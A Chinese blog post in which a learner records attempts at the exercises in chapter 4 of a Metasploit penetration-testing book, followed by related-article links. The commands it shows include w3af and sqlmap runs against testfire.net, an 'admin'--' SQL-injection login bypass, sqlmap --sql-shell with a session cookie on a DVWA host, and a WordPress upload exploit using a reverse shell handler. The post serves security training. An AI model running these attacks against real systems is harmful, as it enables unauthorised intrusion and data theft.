《Metasploit魔鬼训练营》第四章(下)

最新推荐文章于 2023-12-08 14:45:50 发布
最新推荐文章于 2023-12-08 14:45:50 发布
阅读量698 收藏
点赞数 1
文章标签: shell ruby 数据库
原文链接:http://www.cnblogs.com/justforfun12/p/5211907.html
版权

p163 XSSF

默认kali 2.0中没有xssf,先下载:https://code.google.com/archive/p/xssf/downloads

将下载下来的zip文件解压,将其中的data, plugins, lab等文件夹合并到/usr/share/metasploit-framework/中的相应文件夹,然后即可在msfconsole中load xssf。

 按照书上的做,但是最后的攻击并没有成功!

msf auxiliary(browser_autopwn) > xssf_exploit 8 15
[*] Searching Metasploit launched module with JobID = '15'...
[+] A running exploit exists: 'Exploit: windows/browser/ie_createobject'
[*] Exploit execution started, press [CTRL + C] to stop it !

[+] Remaining victims to attack: [[1] (1)]  (停在这里一直不动)

^C[-] Exploit interrupted by the console user

 

p180 实践作业

1、探测www.testfire.net中存在的sql注入漏洞:

root@kali:~# w3af_console 
w3af>>> plugins
w3af/plugins>>> audit sqli 
w3af/plugins>>> crawl web_spider 
w3af/plugins>>> back
w3af>>> target
w3af/config:target>>> set target http://www.testfire.net/bank/login.aspx
w3af/config:target>>> back
The configuration has been saved.
w3af>>> plugins
w3af/plugins>>> output html_file 
w3af/plugins>>> output config html_file 
w3af/plugins/output/config:html_file>>> set verbose True 
w3af/plugins/output/config:html_file>>> back
The configuration has been saved.
w3af/plugins>>> back
w3af>>> start

成功扫出 8 URLs and 10 different injections points.

用sqlmap去扫

sqlmap -u "http://www.testfire.net/bank/login.aspx" --data "uid=Admin&passw=a&btnSubmit=Login"

检测出后台数据库的一些信息

在http://www.testfire.net/bank/login.aspx中通过构造   admin'--   的输入,轻松登入。

但是要怎么进一步的获得数据库中的信息呢?我还没搞定。

 

2、照书本p163做即可

 

3、wXf下载地址:  https://github.com/forced-request/wXf

下载后解压,切换至解压目录下,运行./console,提示

/usr/lib/ruby/2.2.0/rubygems/core_ext/kernel_require.rb:54:in `require': cannot load such file -- iconv (LoadError)

由于对ruby不太熟悉,网上的方法也看不太懂,暂且跳过。

 

4、我选择这个漏洞进行测试     https://www.exploit-db.com/exploits/37182/ 

然而得到的测试结果为:

[CRITICAL] all tested parameters appear to be not injectable.

不知道是不是后台服务器软件的版本问题。

 

5、不知道怎么弄。。先跳过

 

6、通过如下命令成功植入sql shell!

sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#'  --cookie='security=low; PHPSESSID=7918oeoatnur63rq8bokn88sd2' --sql-shell

 

7、p177

按照提示一步一步来,但是没有成功:

[*] Started reverse TCP handler on 10.10.10.128:4444 
[*] Successfully uploaded shell.
[*] Trying to access shell at <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>413 Request Entity Too Large</title>
</head><body>
<h1>Request Entity Too Large</h1>
The requested resource<br />/wordpress//wp-content/plugins/1-flash-gallery/upload.php<br />
does not allow request data with POST requests, or the amount of data provided in
the request exceeds the capacity limit.
</body></html>
...
[*] Exploit completed, but no session was created.

 

转载于:https://www.cnblogs.com/justforfun12/p/5211907.html

weixin_30371469
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Metasploit框架进行渗透测试实战
悦分享
12-21 879
2003年左右,美国的H. D. Moore(世界知名黑客)和Spoonm创建了一个集成多个漏洞渗透工具的框架。随后,这个框架在2004年的Black Hat Briefings上备受关注,Spoonm在大会的演讲中提到,Metasploit的使用方法非常简单,以至于你只需要找到一个目标,单击几下鼠标就可以完成渗透,一切就和电影里面演的一样酷。强大的功能再加上简单的操作使得Metasploit在安全行业迅速传播,Metasploit很快成为业内著名的工具。
Metasploit渗透测试魔鬼训练营》 之 XSS
duangduang2020的博客
10-07 1514
知其然,知其所以然。本系列文章是对《Metasploit渗透测试魔鬼训练营》学习感悟的总结,特别是对书中不明确和没有挖掘原理的部分进行了讲解。一来是对自己的提醒,二来是希望对即将学习本书的人一个帮助和指导。
Metasloit渗透测试魔鬼训练营
adislj007的博客
10-03 1063
初识BT5
[课业] | 软件安全 | 使用渗透性工具Metasploit进行漏洞测试
RussellHan的博客
01-31 1532
Metasploit
基于Metasploit的渗透测试学习
weixin_46132041的博客
07-28 643
写文章主要是为了记录个人的学习,对自己所学的内容进行一次个人的总结。 本文所学来源主要有《Metasploit渗透测试魔鬼训练营》、学习视频以及其他相关文件。其中《Metasploit渗透测试魔鬼训练营》一书只学到第三章,逆向部分还没接触多少,所以第四章以后的内容先不进行学习。 ⭐Metasploit使用流程: 1、确认使用模块 2、配置模块的信息 3、执行 ⭐渗透测试的阶段: 1、前期交互 2、情报搜集:收集的信息包括渗透目标的网络范围、拓扑、开放服务、安全漏洞等全方位信息。
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-web渗透6.pdf 渗透测试-内网客户端渗透9.... 渗透测试-实验拓扑环境4.pdf 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8.pdf 渗透测试-移动环境渗透3.pdf 渗透测试-认识Metesploit2.pdf 渗透测试1.pdf
Metasploit_测试魔鬼训练营.zip
09-27
首本中文原创Metasploit渗透测试著作,国内信息安全领域布道者和资深Metasploit渗透测试...很多知识点都配有案例解析,更重要的是每章还有精心设计的“魔鬼训练营实践作业”,充分体现了“实践,实践,再实践”的宗旨。
Metasploit安全工程师必备/学习【魔鬼训练营】 pdf文档
11-09
Metasploit安全工程师必备/学习【魔鬼训练营】》是一个专门为安全工程师设计的深入学习资源,主要聚焦于Kali Linux中的Metasploit框架。Metasploit是信息安全领域中最广泛使用的开源工具之一,用于进行安全漏洞...
metasploit魔鬼训练营》学习中遇到的相关问题
08-19
在学习《metasploit魔鬼训练营》的过程中,遇到很多的问题,从搭建环境到进行测试,作为一个新手,踩过一些坑,记录下来,以备后查。
testfire渗透测试
Loooyoooxooo的博客
12-08 1345
通过本次实验,我大概了解了网络渗透测试的一般流程,掌握了各种在渗透测试开始前进行信息收集的方法以及一些软件的使用方法,这次实验非常灵活,不像往常是根据固定的报告书和指导做的,而是我们通过所学自由发挥,尽可能进行信息收集并挖掘漏洞,在实验中,学习了如何分析和利用不同类型的漏洞,包括但不限于SQL注入、XSS等。2、使用whois域名注册信息查询,whois是一个用来查询域名注册信息数据库的工具,一般的域名注册信息包含域名所有者、服务商、管理员邮件地址、域名注册日期和过期信息。
安全漏洞检测工具 - Metasploit
2301_79447830的博客
08-18 40
Metasploit是一款安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程,团队合作等。通过为重新编写脚本重新跟踪您利用此漏洞所采取的步骤,使IT运营团队或您的客户端能够验证控件和缓解措施是否成功。与您的内部Nexpose基础架构集成,以启动新扫描并访问实时漏洞发现(需要Nexpose)识别可能导致数据泄露的关键漏洞,以便您首先了解要修补的内容。
POST/有道翻译 有bug
weixin_33696822的博客
10-11 123
1.发现在翻译时地址没有变,那是POST请求。 2.通过fidder抓包工具抓取url 3.对data分析,发现每次salt和sign都在变化。 4.查看源码,先用站长工具http://tool.chinaz.com/Tools/jsformat.aspx格式化,用sublines打开搜索到关键字salt和sign对其分析 5.代码如下,还有bug # -*- codin...
测试xss如何获得目标机器系统权限
weixin_34221112的博客
06-24 611
author:RootkitHat.Org 有装B的嫌疑,但是你如何得知你的目标用什么系统和什么浏览器 相似的工具这里有一个:http://xss-proxy.sourceforge.net 附件: Parh /sploits/2011/06/XSSF.zip 解压后吧附件全部复制到 /msf3/里面 启动metasploit ,创建数据库,并且载入插件 ...
C#生产者与消费者问题(二)
标哥
08-27 811
/* * Created by SharpDevelop. * User: huangyibiao * Date: 2013/8/27 * Time: 11:12 * * To change this template use Tools | Options | Coding | Edit Standard Headers. */ using System; using Syste
服务器端口分配导致job重启
hust_lpx的博客
06-22 378
情况:观察到某job半个多小时之前重启,于是查询jibmanager日志,只能找到如下问题。所以联想到端口的分配问题、错误占用会导致job重启。 日志: 2022-06-22 10:35:30,951 | INFO | [main] | Unable to allocate on port 32326, due to error: Address already in use (Bind failed) | org.apache.flink.util.NetUtils (NetUtils.java:386)
[-] Failed to load plugin from /usr/share/metasploit-framework/plugins/db_autopwn: No classes were l...
weixin_34241036的博客
05-20 904
        问题详情     然后,执行,出现如下问题,则说明大家的这个文件,下载不是完整的或者你上传不完整。   msf &gt; load db_autopwn [-] Failed to load plugin from /usr/share/metasploit-framework/plugins/db_autopwn: No classes were loaded...
kali2.0 metasploit安装xssf模块
至臻求学,胸怀云月
06-20 2719
在百度谷歌找了很多资料,发现都是kali1.0版本甚至更老。 在文章中说的/opt/目录下msf的主目录根本不存在,就更别提安装xssf了。 下载xssf3.0压缩包的地址https://code.google.com/archive/p/xssf/downloads 推荐一个youtube视频,详细介绍kali2.0如何安装xssf模块(需翻墙哦) https://www.youtube
解决Failed to load plugin ‘/usr/lib/x86_64-linux-gnu/gstreamer-1.0/deepstream/libnvdsgst_osd.so‘
lyfnyw870825的博客
06-15 2839
使用deepstream docker 复现 deepstream_pose_estimation中的报错 Failed to load plugin ‘/usr/lib/x86_64-linux-gnu/gstreamer-1.0/deepstream/libnvdsgst_osd.so’: libcudart.so.10.2: cannot open shared object file: No such file or directory 解决方法: 1、$DEEPSTREAM_DIR/libs
metasploit渗透测试 魔鬼训练营
最新发布
12-31
Metasploit是一款广泛使用的渗透测试工具,也被称为"魔鬼训练营"。它是开源的,提供了一系列强大的功能和模块,用于发现和利用计算机系统中的漏洞,以评估系统的安全性和弱点。 Metasploit魔鬼训练营之所以得名,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值